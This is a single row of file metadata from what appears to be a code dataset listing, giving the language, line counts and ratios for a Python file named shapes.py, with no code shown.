| Python | 70 | 17.371429 | 54 | /shapes.py | 0.565555 | 0.556245 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.